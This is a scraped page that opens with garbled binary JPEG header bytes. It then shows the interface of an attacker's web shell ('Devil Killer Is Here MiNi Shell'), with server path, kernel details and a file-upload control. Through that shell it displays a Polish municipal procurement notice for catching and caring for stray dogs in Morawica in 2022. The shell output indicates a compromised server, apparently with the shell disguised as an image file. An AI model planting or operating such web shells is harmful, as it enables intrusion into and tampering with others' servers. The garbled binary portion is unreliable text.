JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220225/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220225/0006833401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa wyłapywania, przejęcia i zapewnienia kompleksowej opieki bezdomnym psom z terenu<br/>Miasta i Gminy Morawica w 2022 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto i Gmina Morawica - Urząd Miasta i Gminy w Morawicy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291010352</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Spacerowa 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Morawica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-026</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">41 31-14-692</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">41 31-14-690</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@morawica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.morawica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa wyłapywania, przejęcia i zapewnienia kompleksowej opieki bezdomnym psom z terenu<br/>Miasta i Gminy Morawica w 2022 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2b066d6e-960f-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00068334</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00016789/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Wyłapywanie i zapewnienie opieki bezdomnym psom z terenu Miasta i Gminy Morawica</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/Postepowania <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/Postepowania, https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl, ePUAPu<br/>https://epuap.gov.pl/wps/portal <br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzy¬stania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Regulaminie ePUAP.<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego,<br/>akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać po¬stanowień tego regulaminu.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>6. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy<br/>Pzp,podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych<br/>informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazaniana ePUAP.<br/>7. W postępowaniu o udzielenie zamówienia korespondencja (inna niż oferta Wykonawcy i załączniki do oferty) odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji). Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP).<br/>8. Przekazanie korespondencji w sposób opisany w ust. 7 wymaga obowiązkowego poinformowania<br/>Zamawiającego o przekazaniu wiadomości na adres e-mail wskazany w rozdziale I „Zamawiający”<br/>(niedopełnienie tego obowiązku uznane będzie jako nieskuteczne przekazanie dokumentów).<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej”<br/>9. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń<br/>składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki.<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres e-mail wskazany w rozdziale I „Zamawiający”. Sposób sporządzenia dokumentów elektronicznych,<br/>oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami<br/>określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego.<br/>10. Postępowanie o udzielenie zamówienia prowadzi się w języku polskim.<br/>11. Dokumenty i oświadczenia składane przez wykonawcę powinny być w języku polskim. W<br/>przypadku załączenia dokumentów sporządzonych w innym języku niż dopuszczony, wykonawca<br/>zobowiązany jest załączyć tłumaczenie na język polski.<br/>12. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ dla prowadzonego postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>- administratorem Pani/Pana danych osobowych jest Miasto i Gmina Morawica.<br/>- inspektorem ochrony danych osobowych w Gminie Morawica jest Pan Marcin Dziewięcki, kontakt:<br/>tel.: +48 41 311 46 92 wew. 202, adres e-mail: m.dziewiecki@morawica.pl<br/>- Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego;<br/>- odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm.);<br/>- Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia lub na okres przechowywania tych<br/>danych zgodnie z wytycznymi o dofinansowania z środków UE;<br/>- obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>- w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>- posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>- nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym<br/>wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną<br/>Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z włączeń, o których mowa w art. 14 ust. 5 RODO.<br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego<br/>administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony<br/>danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony<br/>praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RG.271.22.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiotem zamówienia jest usługa wyłapywania, przejęcia i zapewnienia kompleksowej<br/>opieki bezdomnym psom z terenu Miasta i Gminy Morawica w 2022 r.<br/>2.Usługa w zakresie wyłapywania bezdomnych psów obejmuje:<br/>a) utrzymywanie gotowości organizacyjnej, technicznej i logistycznej w zakresie świadczenia<br/>usług wyłapywania psów przez okres na jaki została zawarta umowa,<br/>b) wyłapywanie psów z terenu Miasta i Gminy po telefonicznym zgłoszeniu zgodnie z warunkami<br/>umowy,<br/>c) transport wyłapanych psów do schroniska lub miejsca czasowego pobytu zwierząt,<br/>d) zapewnienie w razie potrzeby opieki weterynaryjnej podczas wyłapywania i transportu psów.<br/>e) prowadzenie ewidencji bezdomnych psów wyłapanych z terenu Miasta i Gminy Morawica i<br/>umieszczonych w schronisku lub miejscu czasowego pobytu w sposób pozwalający na ich<br/>identyfikację na podstawie dokumentacji zdjęciowej i innej.<br/>3. Usługa w zakresie przejęcia i zapewnienia kompleksowej opieki wyłapanym psom obejmuje:<br/>a) okres od momentu ich schwytania do śmierci psa bądź jego adopcji<br/>b) zapewnienie bezdomnym psom miejsca w schronisku dla zwierząt prowadzonym przez<br/>uprawniony podmiot z kompleksową opieką, w tym:<br/>- zapewnienie pomieszczenia odpowiedniego dla rasy, płci, wieku i kondycji zdrowotnej psa ,<br/>chroniącego psy przed zimnem i opadami atmosferycznymi, z dostępem do światła dziennego,<br/>umożliwiającego zmianę pozycji ciała,<br/>- zapewnienie odpowiedniej karmy i stałego dostępu do wody zdatnej do picia,<br/>- zapewnienie możliwości wybiegu/spaceru,<br/>- obligatoryjna sterylizacja lub kastracja psów, odrobaczanie, szczepienia przeciw wściekliźnie,<br/>- usypianie ślepych miotów,<br/>- eutanazja psów nie rokujących nadziei na wyleczenie po uzyskaniu opinii lekarskiej na koszt<br/>Wykonawcy,<br/>c) realizację programu adopcji psów poprzez:<br/>- rozpowszechnianie informacji o możliwości adopcji<br/>- zapewnienie adopcji co najmniej 3 psów w ramach jednego kwartału w okresie na jaki została<br/>zawarta umowa,<br/>- sporządzanie i składanie Zamawiającemu raz na kwartał informacji co do liczby psów<br/>przekazanych do adopcji.<br/>4. Wykonawca jest odpowiedzialny za organizację świadczenia wykonywania usługi w sposób<br/>nie stwarzający zagrożenia dla bezpieczeństwa i porządku publicznego, przez osoby<br/>posiadające właściwe kwalifikacje .<br/>5. Używane przez Wykonawcę przy wyłapywaniu psów urządzenia i środki nie mogą stwarzać<br/>zagrożenia dla ich życia i zdrowia ani zadawać im cierpienia.<br/>6. Środki transportu zwierząt winny spełniać warunki, o których mowa w art. 24 ust.1 ustawy o<br/>ochronie zwierząt.<br/>7. Szacunkowa liczba wyłapanych i przekazanych psów w okresie realizacji zamówienia – 60<br/>szt., w tym 51 szt. – dorosłe psy i 9 szt. szczeniaki (psy do ukończenia 1-go roku życia).<br/>Podana liczba ma charakter orientacyjny i może ulec zmianie. Rozliczenia z tytułu świadczonych<br/>usług między Wykonawcą a Zamawiającym będą dokonywane w odniesieniu do faktycznej<br/>liczby wyłapanych psów.<br/>8. Przedmiot zamówienia należy realizować zgodnie z:<br/>- ustawą z dnia 21 sierpnia 1997 r. o ochronie zwierząt (tj. Dz. U. z 2020 r. poz. 638.),<br/>- ustawą z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób<br/>zakaźnych zwierząt (Dz. U. z 2020 r. poz. 1421),<br/>- Rozporządzeniem Ministra Rolnictwa i Rozwoju Wsi z 23 czerwca 2004 r. w sprawie<br/>szczegółowych wymagań weterynaryjnych dla prowadzenia schronisk dla zwierząt (Dz. U. z<br/>2004 r. Nr 158, poz. 1657),<br/>- Rozporządzeniem MSWiA z dnia 26 sierpnia 1998 r. w sprawie zasad i warunków wyłapywania<br/>bezdomnych zwierząt (Dz. U. z 1998 r. Nr 116 poz. 753)<br/>- ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach /tj. Dz. U. z<br/>2021 r. poz. 888/ oraz przepisami wykonawczymi wydanymi na podstawie w/w ustaw. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98380000-0 - Usługi psiarni</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85200000-1 - Usługi weterynaryjne</p> <p class="mb-0">85210000-3 - Ośrodki pielęgnowania zwierząt domowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień powtarzających.<br/>1) Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7<br/>PZP, w okresie 3 lat od dnia udzielenia zamówienia podstawowego. Zamówienia te polegać będą na<br/>powtórzeniu usług podobnych do usług stanowiących przedmiot niniejszego zamówienia.<br/>Zakres rzeczowy usług stanowiących przedmiot zamówień, o których mowa w pkt 1 nie przekroczy<br/>wartości 50 % wartości niniejszego zamówienia.<br/>2) Zamówienia, o których mowa w pkt 1 będą udzielane po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia publicznego w trybie zamówienia z wolnej ręki, a jeżeli wartość szacunkowa będzie mniejsza od kwoty o której mowa w art. 2 ust.1 pkt 1 ustawy Pzp tylko po przeprowadzenie negocjacji.<br/>3) Zamówienia, o których mowa w pkt 1 będą udzielane w przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego usług na innym zadaniu planowanym lub realizowanym przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował kryteriami<br/>określonymi poniżej.<br/>2. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3. Za najkorzystniejszą zostanie uznana oferta z najwyższą sumą punktów za dwa kryteria.<br/>4.W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej ilości przyznanych punktów, wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>5.W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących<br/>treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>6.Zamawiający wybiera najkorzystniejszą ofertą w terminie związania ofertą określonym w SWZ.<br/>7.Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>8. W przypadku braku zgody, o której mowa w ust. 7, oferta podlega odrzuceniu, a Zamawiający<br/>zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została najwyżej<br/>oceniona, chyba, że zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.Wykonawca biorący udział w postępowaniu winien spełniać następujące warunki :<br/>a) posiadać zdolność do występowania w obrocie gospodarczym ,<br/>b) posiadać uprawnienia do prowadzenia działalności stanowiącej przedmiot zamówienia ,<br/>c) posiadać zdolność techniczną i zawodową.<br/>2. Za posiadającego zdolność do występowania w obrocie gospodarczym Zamawiający uzna<br/>wykonawcę prowadzącego działalność gospodarczą lub zawodową , który posiada wpis do<br/>ewidencji działalności gospodarczej lub innego rejestru zawodowego lub handlowego .<br/>3. Za posiadającego uprawnienia do prowadzenia działalności stanowiącej przedmiot<br/>zamówienia Zamawiający uzna wykonawcę , który posiada :<br/>a) zezwolenie wydane przez Burmistrza Miasta i Gminy Morawica na prowadzenie działalności<br/>w zakresie 